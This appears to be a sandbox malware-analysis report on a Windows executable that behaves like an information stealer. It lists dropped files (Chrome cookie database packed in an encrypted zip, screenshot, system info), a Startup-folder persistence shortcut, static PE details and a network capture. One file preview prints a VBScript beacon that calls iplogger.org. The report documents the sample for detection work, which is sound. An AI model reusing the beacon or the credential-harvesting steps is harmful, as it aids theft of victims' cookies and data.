                                                                    SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                    MD5:72A43D390E478BA9664F03951692D109
                                                                    SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                    SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                    SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    C:\Users\user\AppData\Local\Temp\djUYPUrixI\files_\screenshot.jpg
                                                                    Process:C:\Users\user\Desktop\7yyqdBJVGf.exe
                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
                                                                    Category:dropped
                                                                    Size (bytes):71402
                                                                    Entropy (8bit):7.814753768424839
                                                                    Encrypted:false
                                                                    SSDEEP:1536:Ik3jy5vV5nExVY6WRxrdTul+UqEaN776pDeaw7qk5Zn541XV8v:oRV5naWFSljqEtpg7TXnqxY
                                                                    MD5:8857E81A87DD6EF97F3F4744EB564692
                                                                    SHA1:E7993E4B309E202FBDE8BFD4CCF65013AA88FC03
                                                                    SHA-256:FB5864C55C356561FB5FF45D19A030E02216DEB58E491AFA5865AFB4D2E6502E
                                                                    SHA-512:2D8FB1974E0EDD37258202492C6ED2C6BD3462DF04F425B26FD3C61BF053C0903C6C329C95DB24E677C257A2B9C7C3AD43EBD992574F929E419002DBC4B975D8
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: ......JFIF.....`.`.....C................%.....- ".%5/874/43;BUH;?P?34JdKPWZ_`_9Ghog\nU]_[...C.......+..+[=4=[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..E-.(...(..U..K2..,p$s.~...*.:-.|.+.......6.Y.t....X..s...r6.\..?....I..a..~dQ..cQS..\....^0z.8?C...D.E-..JJZJ.%%v1...H.....7.....;...........s.b.....9v8.+....?..O....[.Se.=.0c..7..8..hTv...(.W..+R..(...+..?.t.kO...'g.].U..I..+.e......._.._..i?...........4W}...........q...h=..\..F..J...z..$.j.i)M...E-..J+O.vp.......V*..v5....?.._..i9$5..OEz.. z..........(EX
                                                                    C:\Users\user\AppData\Local\Temp\djUYPUrixI\files_\system_info.txt
                                                                    Process:C:\Users\user\Desktop\7yyqdBJVGf.exe
                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
                                                                    Category:dropped
                                                                    Size (bytes):20422
                                                                    Entropy (8bit):3.5217410771938957
                                                                    Encrypted:false
                                                                    SSDEEP:384:1l8UOpGQGXJ0eDcDDfZmEiv5bJtWmGu37mx1FqGbUpYR6PWhBzR6em7HQCV1FaoO:1nOpR2J0eDcDDfZmEiv5bJtWmGu37mxJ
                                                                    MD5:F0F302D7C1F31B4C7132C2A59DC7D3AF
                                                                    SHA1:9D289BCB09919874C6B05B777455B26E1F4975C1
                                                                    SHA-256:1467B1D39A4EE0DE7B7D5F9C7F4B8D097AF21C1C623E05124CE4DE7B7917B648
                                                                    SHA-512:332F12B971184BD67416DAC47625A63ACC59C326EAA89D9D86F87C9F72A1F8626F06089105F2E0B07FECF0BEFB7DFB388B8C2FAC8E230170FEEDF60D04300AA8
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: ..S.t.a.r.t. .B.u.i.l.d.:. . . . . . . . . . . . . .C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.D.e.s.k.t.o.p.\.7.y.y.q.d.B.J.V.G.f...e.x.e.....O.S.:. . . . . . . . . . . . . . . . . . . . . . .W.i.n.d.o.w.s. .1.0. .P.r.o. . . .6.4.-.b.i.t._.(.x.6.4.). . . .B.u.i.l.d.:. .1.7.1.3.4. . . .R.e.l.e.a.s.e.:. .1.8.0.3.....O.S. .L.a.n.g.u.a.g.e.:. . . . . . . . . . . . . .e.n.-.U.S.....K.e.y.b.o.a.r.d. .L.a.n.g.u.a.g.e.s.:. . . . . . .E.n.g.l.i.s.h. .(.U.n.i.t.e.d. .S.t.a.t.e.s.). .|. .....L.o.c.a.l. .D.a.t.e. .a.n.d. .T.i.m.e.:. . . . . .2.0.2.1.-.0.9.-.2.8. .1.6.:.3.1.:.2.3.....U.T.C.:. . . . . . . . . . . . . . . . . . . . . .-.0.7.0.0.....U.s.e.r.N.a.m.e. .(.C.o.m.p.u.t.e.r.N.a.m.e.).:. .f.r.o.n.t.d.e.s.k. .(.5.6.2.2.5.8.).....C.P.U.:. . . . . . . . . . . . . . . . . . . . . .I.n.t.e.l.(.R.). .C.o.r.e.(.T.M.).2. .C.P.U. .6.6.0.0. .@. .2...4.0. .G.H.z. .(.C.o.r.e.s.:. .4.).....T.o.t.a.l. .R.A.M.:. . . . . . . . . . . . . . . .8.1.9.1. . .M.B.....G.P.U.:. . . . . . . . . . . . . . . . . . . . . .
                                                                    C:\Users\user\AppData\Local\Temp\djUYPUrixI\mrBjrfbmEC.zip
                                                                    Process:C:\Users\user\Desktop\7yyqdBJVGf.exe
                                                                    File Type:Zip archive data, at least v2.0 to extract
                                                                    Category:dropped
                                                                    Size (bytes):72919
                                                                    Entropy (8bit):7.995408367456888
                                                                    Encrypted:true
                                                                    SSDEEP:1536:JYJOTBzrEMWhfbS/go4mfNoMGkxtij9V0cTBcB1nGldKt3gl4:G2zY79O/gvEWktijfByWdKpgO
                                                                    MD5:14DF06C897F9DAE58783D3381F016CC4
                                                                    SHA1:27DE8F7A504841BB6F956AF8017ADE3F814B2C08
                                                                    SHA-256:958D14E52C68B95B7DA2F19C9BDDAB8915CC92A7D6309AC47E5BEBEF5F09C234
                                                                    SHA-512:DDA618461371C6551022FED4F0292A6C5EAEC3F953BFD276491AFAEFEED18DD4D2F94675FED9D6595885E31911F8784F22F150D9F4BE4C960E025C998D37A11C
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: PK.........y>Q.........P......_Chrome/default_cookies.dbUT....t_.Sa.Sa...wf.p.].T.x.v.*.....AG...{y%.cb.l&...[..D0..s...-.u..ML.9O.'>7...v.U....pC.~c..5......[..h)sM....f:.s.. .2.+Cr..~..vP.%4}.S.. .]n....g.....E.......n.[.q....k._...4.7`<....5..4.hJ.......]v(.fje.3-..p.......s6...v..#...R.'.<.....:.P.^xR.\.Bv..t,..s(Oy. .......Q.......|..7.+...?...*.8..u."..?rs>T.5..a....0.d=u@..b.L..!..%,.^...L3.>...._..,VB( Op.h.`.~%q...xj.co..L]..>..._)H._.s....lfm.8..0.....V.=..z.y..v[..[}...5..U#.........\J.b..!.m.Y.#..0..wB"~:..S*...D.....6.Lv.2.32..UX..../.8-....4/~w..p....v.....nc....d...F.|/.....F....7....J...J..X.K{.|.}j....W#".....5X.#&>o.....z+.T.@.r2G ...^.4t1.Kel....t.-<q.Y..`R..c.uD.4...u...MO.g..2...?.-~.^%7a.n3W..K............<.Y.a..qY{].^"@...r>..*...h...B.{...X...J....=.....2=.....9...H..`..t....S.j.g....<..iL.Yvj;"Q.WF........27.#..u..\.....@.$.).p..6...rh='.)0y..yo.b/...a/.=7NB.[..~f.t.a.I.(........s...6f...e.R+qF5.o.|...d^..
                                                                    C:\Users\user\AppData\Local\Temp\lmlpnsexh.vbs
                                                                    Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com
                                                                    File Type:ASCII text
                                                                    Category:modified
                                                                    Size (bytes):133
                                                                    Entropy (8bit):5.096117172231276
                                                                    Encrypted:false
                                                                    SSDEEP:3:daiX9GTvvRFzxcXhm8jtyH4b4tHNSCCAvKy6N0Mn:dPtGTvJFmXg08HfHcCCASy6N0M
                                                                    MD5:421471610475BD2C9CB8F9B534A64BFD
                                                                    SHA1:37EEF2409CC2B31FE5E481393699AC35329230E1
                                                                    SHA-256:BA5B5035D753ECB72FFE3D3C1F30EA72BD90E34EFCBD11B12041975DC98FEFD4
                                                                    SHA-512:6C7957B7D88FB78080D126A296B656B6AA5F12C55B5EC33743F22F10CC6B3F41912D42B43C6C561699282A681C03704FA408E2DDD5A1B9EB40558699A33201FB
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: On error resume next..set rsymqli = CreateObject("Microsoft.XMLHTTP").rsymqli.open "GET","https://iplogger.org/1N5Jh7",0.rsymqli.send
                                                                    C:\Users\user\AppData\Local\Temp\nsc24D7.tmp\UAC.dll
                                                                    Process:C:\Users\user\AppData\Local\Temp\File.exe
                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):14848
                                                                    Entropy (8bit):5.715583967305762
                                                                    Encrypted:false
                                                                    SSDEEP:192:DiF6v2imI36Op/tGZGfWxdyWHD0I53vLl7WVl8e04IpDlPjs:DGVY6ClGoWxXH75T1WVl83lLs
                                                                    MD5:ADB29E6B186DAA765DC750128649B63D
                                                                    SHA1:160CBDC4CB0AC2C142D361DF138C537AA7E708C9
                                                                    SHA-256:2F7F8FC05DC4FD0D5CDA501B47E4433357E887BBFED7292C028D99C73B52DC08
                                                                    SHA-512:B28ADCCCF0C33660FECD6F95F28F11F793DC9988582187617B4C113FB4E6FDAD4CF7694CD8C0300A477E63536456894D119741A940DDA09B7DF3FF0087A7EADA
                                                                    Malicious:false
                                                                    Antivirus:
• Antivirus: Metadefender, Detection: 0%
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Reputation:unknown
                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#.?NB.lNB.lNB.li..lEB.lNB.l.B.li..lMB.li..lOB.li..lOB.li..lOB.lRichNB.l................PE..L...@.dU...........!.....,...........).......@...............................p.......................................;..<....3..x....P.......................`..........................................................\............................text....+.......,.................. ..`.data...d....@.......0..............@....rsrc........P.......2..............@..@.reloc.......`.......4..............@..B........................................................................................................................................................................................................................................................................................................................................................................................
                                                                    C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe
                                                                    Process:C:\Users\user\AppData\Local\Temp\dislip\parted.exe
                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):3570176
                                                                    Entropy (8bit):7.965168872050083
                                                                    Encrypted:false
                                                                    SSDEEP:49152:2uktwV1jARt5+JYoCQnKlZqpvjQmjmwqjlQ1XDDAiKHbZ5sJcinzTPJmTlWouyEy:S4AR2JfFm87Qmx+Q1tfzuoouGR
                                                                    MD5:C92045F9553387FE8AB90B2B6A24E805
                                                                    SHA1:2DBEAA703044CC1862C4DEFB3A6D296F2AAF21CB
                                                                    SHA-256:EAB2C4113047771525F41FAAEAB5E4946691F44C9E5848C540593752C10D3C47
                                                                    SHA-512:238009E38F830F6354C30967E6A60FD237262D9B7515B591CC24C471574095B4E62B0B29D84DD4B21AD33C8BA3ABCF10C2985C8C67FBBDDDF90BC652715106FF
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 36%
                                                                    Reputation:unknown
                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................73.....71.....70......................sT.....sT........?...sT.....<......<......Rich............PE..d...(..\.........."......P...J......X.`........@....................................p#7...`.................................................................T.`..................................................................................................... .O.......................... ..` .....`...T..................@..@ x7...`......................@... ............................@..@ .............*..............@..@ H............,..............@..@ |............0..............@..B.idata...............8..............@....themida..]..........:..............`....boot....@5...`..@5..:..............`..`................................................................................
                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IntelRapid.lnk
                                                                    Process:C:\Users\user\AppData\Local\Temp\dislip\parted.exe
                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Archive, ctime=Tue Sep 28 21:24:18 2021, mtime=Tue Sep 28 21:24:18 2021, atime=Tue Sep 28 08:46:06 2021, length=3570176, window=hide
                                                                    Category:dropped
                                                                    Size (bytes):941
                                                                    Entropy (8bit):5.038850272887955
                                                                    Encrypted:false
                                                                    SSDEEP:12:8i4d2Ce4GL2rCglK0Y//N3leL0lqf2BplrqhjAyuNHnEmiT2y7D73dBm:8p28GLAF+FV4KquBsAygEm2jm
                                                                    MD5:65AA1D5289150C843AB180F7D4BC8670
                                                                    SHA1:F5A710C3D618DBD09897FB3B35085F6C4A1CAEE5
                                                                    SHA-256:97983619E6E9D349849AEADABED1990FB1E50576C943CA150DB4DB97A94F1476
                                                                    SHA-512:63DAEF44D88B730BABBE815AC41111BCE91553BDDFF08C866AD8803511449BAE0884426EA3D520F7B1FC9356933648CFFDD66826631523DEE69DE2E135AE0D0C
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: L..................F.... ...xw......u.7.......O.M....z6.......................:..DG..Yr?.D..U..k0.&...&......7...#-...7u.=...99R.........t...CFSF..1......N....AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......N..<S......Y.....................P/.A.p.p.D.a.t.a...B.V.1.....<S....Roaming.@.......N..<S.......Y...................."...R.o.a.m.i.n.g.....`.1.....<S....INTELR~1..H......<S..<S.......Z.....................,..I.n.t.e.l. .R.a.p.i.d.....j.2..z6.<S.M .INTELR~1.EXE..N......<S..<S................................I.n.t.e.l.R.a.p.i.d...e.x.e.......l...............-.......k............^F......C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe....I.n.t.e.l. .R.a.p.i.d.).....\.....\.....\.....\.....\.I.n.t.e.l. .R.a.p.i.d.\.I.n.t.e.l.R.a.p.i.d...e.x.e.`.......X.......562258...........!a..%.H.VZAj....^..0............!a..%.H.VZAj....^..0...........E.......9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............

                                                                    Static File Info

                                                                    General

                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Entropy (8bit):6.552669921961029
                                                                    TrID:
                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:7yyqdBJVGf.exe
                                                                    File size:380416
                                                                    MD5:267667a4bbfdfcf20c407c2b191fd0ed
                                                                    SHA1:73870de4caa2eaaf162c81c34740527e12b8467c
                                                                    SHA256:c3b9a8dde21bf3c1bb09426a261c77eb4b59cb2f36ac82e5b8f6b4a4d3565b5b
                                                                    SHA512:604c56940caf033ea9132067f47030272042c22d73c4ea8744508e75cca5d6c6058c917c32f72b0e29cecb2c5349e52a111af15f21990d2089f4ed098773565d
                                                                    SSDEEP:6144:KWlOABZeO3au2bLpXWdCn7p7DdVr1gmImu3kr1jtCGT7AqLKVt8xijgSFDE:KW8EZ93aBLpXaqhRXgw5Cw8VtDjv9
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........B...#...#...#...U1..#...U...#...U0..#...[...#...#...#...U5..#...U...#...U...#..Rich.#..................PE..L.../_e`...........

                                                                    File Icon

                                                                    Icon Hash:aadaae9ec6a68aa4

                                                                    Static PE Info

                                                                    General

                                                                    Entrypoint:0x402310
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                    DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x60655F2F [Thu Apr 1 05:50:39 2021 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:5
                                                                    OS Version Minor:1
                                                                    File Version Major:5
                                                                    File Version Minor:1
                                                                    Subsystem Version Major:5
                                                                    Subsystem Version Minor:1
                                                                    Import Hash:56c207817e66e7690a43bf97b1ee7374

                                                                    Entrypoint Preview

                                                                    Instruction
                                                                    mov edi, edi
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    call 00007F7918A1762Bh
                                                                    call 00007F7918A0CE66h
                                                                    pop ebp
                                                                    ret
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    mov edi, edi
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    push FFFFFFFEh
                                                                    push 004234B0h
                                                                    push 004096A0h
                                                                    mov eax, dword ptr fs:[00000000h]
                                                                    push eax
                                                                    add esp, FFFFFF98h
                                                                    push ebx
                                                                    push esi
                                                                    push edi
                                                                    mov eax, dword ptr [00425918h]
                                                                    xor dword ptr [ebp-08h], eax
                                                                    xor eax, ebp
                                                                    push eax
                                                                    lea eax, dword ptr [ebp-10h]
                                                                    mov dword ptr fs:[00000000h], eax
                                                                    mov dword ptr [ebp-18h], esp
                                                                    mov dword ptr [ebp-70h], 00000000h
                                                                    lea eax, dword ptr [ebp-60h]
                                                                    push eax
                                                                    call dword ptr [0041C0ECh]
                                                                    cmp dword ptr [02B8EE80h], 00000000h
                                                                    jne 00007F7918A0CE60h
                                                                    push 00000000h
                                                                    push 00000000h
                                                                    push 00000001h
                                                                    push 00000000h
                                                                    call dword ptr [0041C0B0h]
                                                                    call 00007F7918A0CFE3h
                                                                    mov dword ptr [ebp-6Ch], eax
                                                                    call 00007F7918A1814Bh
                                                                    test eax, eax
                                                                    jne 00007F7918A0CE5Ch
                                                                    push 0000001Ch
                                                                    call 00007F7918A0CFA0h
                                                                    add esp, 04h
                                                                    call 00007F7918A0FA08h
                                                                    test eax, eax
                                                                    jne 00007F7918A0CE5Ch
                                                                    push 00000010h
                                                                    call 00007F7918A0CF8Dh
                                                                    add esp, 04h
                                                                    push 00000001h
                                                                    call 00007F7918A14103h
                                                                    add esp, 04h
                                                                    call 00007F7918A180BBh
                                                                    mov dword ptr [ebp-04h], 00000000h
                                                                    call 00007F7918A1704Fh
                                                                    test eax, eax

                                                                    Rich Headers

                                                                    Programming Language:
                                                                    • [LNK] VS2010 build 30319
                                                                    • [ASM] VS2010 build 30319
                                                                    • [ C ] VS2010 build 30319
                                                                    • [C++] VS2010 build 30319
                                                                    • [RES] VS2010 build 30319
                                                                    • [IMP] VS2008 SP1 build 30729

                                                                    Data Directories

                                                                    Name | Virtual Address | Virtual Size | Is in Section
                                                                    --- | --- | --- | ---
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | 
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x23aa4 | 0x50 | .rdata
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2790000 | 0x3120 | .rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | 
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | 
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2794000 | 0x1868 | .reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x1c220 | 0x1c | .rdata
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | 
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | 
                                                                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | 
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x232a0 | 0x40 | .rdata
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | 
                                                                    IMAGE_DIRECTORY_ENTRY_IAT | 0x1c000 | 0x1d4 | .rdata
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | 
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | 
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | 

                                                                    Sections

                                                                    Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                    --- | --- | --- | --- | --- | --- | --- | --- | ---
                                                                    .text | 0x1000 | 0x1a60b | 0x1a800 | False | 0.453898879717 | data | 6.24968179234 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                    .rdata | 0x1c000 | 0x8582 | 0x8600 | False | 0.28565181903 | data | 4.60513458883 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .data | 0x25000 | 0x276ae84 | 0x25e00 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                    .rsrc | 0x2790000 | 0x3120 | 0x3200 | False | 0.749140625 | data | 6.50262439546 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .reloc | 0x2794000 | 0x10a04 | 0x10c00 | False | 0.0790286847015 | data | 1.02238104719 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                    Resources

                                                                    Name | RVA | Size | Type | Language | Country
                                                                    --- | --- | --- | --- | --- | ---
                                                                    AFX_DIALOG_LAYOUT | 0x2792fe8 | 0x2 | data | Mongolian | Mongolia
                                                                    PAMIFEGIHURULUFUKIYUVUWOGULOJOK | 0x2792860 | 0x6f0 | ASCII text, with very long lines, with no line terminators | Mongolian | Mongolia
                                                                    RT_ICON | 0x27902a0 | 0x25a8 | dBase III DBT, version number 0, next free block index 40 | English | United States
                                                                    RT_ACCELERATOR | 0x2792f50 | 0x78 | data | Mongolian | Mongolia
                                                                    RT_GROUP_ICON | 0x2792848 | 0x14 | data | English | United States
                                                                    RT_VERSION | 0x2792ff0 | 0x130 | data | Mongolian | Mongolia
                                                                    None | 0x2792fc8 | 0xa | data | Mongolian | Mongolia
                                                                    None | 0x2792fd8 | 0xa | data | Mongolian | Mongolia

                                                                    Imports

                                                                    DLL | Import
                                                                    --- | ---
                                                                    KERNEL32.dll | TlsGetValue, SetLocalTime, InterlockedIncrement, GetCommState, GetProfileStringW, UnlockFile, CallNamedPipeW, FreeEnvironmentStringsA, GetNumberFormatA, FindResourceExA, GlobalAlloc, GetPrivateProfileIntA, LoadLibraryW, GetConsoleAliasExesLengthW, HeapDestroy, CreateSemaphoreA, EnumResourceLanguagesA, GetModuleFileNameW, GetCompressedFileSizeA, GetSystemDirectoryA, CreateActCtxA, GetBinaryTypeW, LCMapStringA, GetStartupInfoA, lstrlenA, GetStdHandle, FreeLibraryAndExitThread, GetLastError, GetProcAddress, CreateNamedPipeA, EnterCriticalSection, LoadLibraryA, OpenMutexA, WritePrivateProfileStringA, SetThreadIdealProcessor, FindAtomA, SetSystemTime, FindNextFileA, WriteProfileStringA, CreateIoCompletionPort, FindFirstChangeNotificationA, HeapSetInformation, GetCurrentDirectoryA, SetFileShortNameA, UnregisterWaitEx, CopyFileExA, DeleteFileA, GetVolumeInformationW, LocalFileTimeToFileTime, GetThreadContext, SetThreadLocale, GetCommandLineW, WideCharToMultiByte, EncodePointer, DecodePointer, GetCommandLineA, GetStartupInfoW, InterlockedDecrement, GetModuleHandleW, ExitProcess, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, WriteFile, GetACP, GetOEMCP, GetCPInfo, IsValidCodePage, TlsAlloc, TlsSetValue, GetCurrentThreadId, TlsFree, SetLastError, HeapValidate, IsBadReadPtr, LeaveCriticalSection, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetModuleFileNameA, FreeEnvironmentStringsW, GetEnvironmentStringsW, HeapCreate, IsProcessorFeaturePresent, OutputDebugStringA, WriteConsoleW, OutputDebugStringW, RtlUnwind, LCMapStringW, MultiByteToWideChar, GetStringTypeW, SetFilePointer, GetConsoleCP, GetConsoleMode, HeapAlloc, HeapReAlloc, HeapSize, HeapQueryInformation, HeapFree, SetStdHandle, FlushFileBuffers, RaiseException, CreateFileW, CloseHandle
                                                                    ADVAPI32.dll | InitiateSystemShutdownA, AbortSystemShutdownA
                                                                    WINHTTP.dll | WinHttpOpen

                                                                    Version Infos

                                                                    Description | Data
                                                                    --- | ---
                                                                    Translation | 0x0120 0x04b8

                                                                    Possible Origin

                                                                    Language of compilation system | Country where language is spoken | Map
                                                                    --- | --- | ---
                                                                    Mongolian | Mongolia | 
                                                                    English | United States | 

                                                                    Network Behavior

                                                                    Network Port Distribution

                                                                    TCP Packets

                                                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                    --- | --- | --- | --- | ---
                                                                    Sep 28, 2021 15:24:06.687999010 CEST | 49752 | 80 | 192.168.2.7 | 45.140.167.227
                                                                    Sep 28, 2021 15:24:06.750448942 CEST | 80 | 49752 | 45.140.167.227 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:06.750557899 CEST | 49752 | 80 | 192.168.2.7 | 45.140.167.227
                                                                    Sep 28, 2021 15:24:06.751216888 CEST | 49752 | 80 | 192.168.2.7 | 45.140.167.227
                                                                    Sep 28, 2021 15:24:06.751425982 CEST | 49752 | 80 | 192.168.2.7 | 45.140.167.227
                                                                    Sep 28, 2021 15:24:06.751626968 CEST | 49752 | 80 | 192.168.2.7 | 45.140.167.227
                                                                    Sep 28, 2021 15:24:06.814325094 CEST | 80 | 49752 | 45.140.167.227 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:06.814424992 CEST | 49752 | 80 | 192.168.2.7 | 45.140.167.227
                                                                    Sep 28, 2021 15:24:06.814749956 CEST | 80 | 49752 | 45.140.167.227 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:06.814905882 CEST | 49752 | 80 | 192.168.2.7 | 45.140.167.227
                                                                    Sep 28, 2021 15:24:06.879837036 CEST | 80 | 49752 | 45.140.167.227 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:06.879978895 CEST | 49752 | 80 | 192.168.2.7 | 45.140.167.227
                                                                    Sep 28, 2021 15:24:06.880781889 CEST | 80 | 49752 | 45.140.167.227 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:06.880812883 CEST | 80 | 49752 | 45.140.167.227 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:06.880886078 CEST | 49752 | 80 | 192.168.2.7 | 45.140.167.227
                                                                    Sep 28, 2021 15:24:06.880920887 CEST | 49752 | 80 | 192.168.2.7 | 45.140.167.227
                                                                    Sep 28, 2021 15:24:06.881453037 CEST | 80 | 49752 | 45.140.167.227 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:06.881541967 CEST | 49752 | 80 | 192.168.2.7 | 45.140.167.227
                                                                    Sep 28, 2021 15:24:06.882301092 CEST | 80 | 49752 | 45.140.167.227 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:06.882384062 CEST | 49752 | 80 | 192.168.2.7 | 45.140.167.227
                                                                    Sep 28, 2021 15:24:06.941416025 CEST | 80 | 49752 | 45.140.167.227 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:06.941437006 CEST | 80 | 49752 | 45.140.167.227 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:06.941762924 CEST | 80 | 49752 | 45.140.167.227 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:06.941778898 CEST | 80 | 49752 | 45.140.167.227 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:06.942296982 CEST | 80 | 49752 | 45.140.167.227 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:06.944212914 CEST | 80 | 49752 | 45.140.167.227 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:06.944278955 CEST | 80 | 49752 | 45.140.167.227 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:06.944294930 CEST | 80 | 49752 | 45.140.167.227 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:06.990432024 CEST | 80 | 49752 | 45.140.167.227 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:06.990590096 CEST | 49752 | 80 | 192.168.2.7 | 45.140.167.227
                                                                    Sep 28, 2021 15:24:06.990777016 CEST | 49752 | 80 | 192.168.2.7 | 45.140.167.227
                                                                    Sep 28, 2021 15:24:07.054300070 CEST | 80 | 49752 | 45.140.167.227 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:08.763298988 CEST | 49755 | 80 | 192.168.2.7 | 104.168.214.97
                                                                    Sep 28, 2021 15:24:08.930423021 CEST | 80 | 49755 | 104.168.214.97 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:08.930617094 CEST | 49755 | 80 | 192.168.2.7 | 104.168.214.97
                                                                    Sep 28, 2021 15:24:08.931358099 CEST | 49755 | 80 | 192.168.2.7 | 104.168.214.97
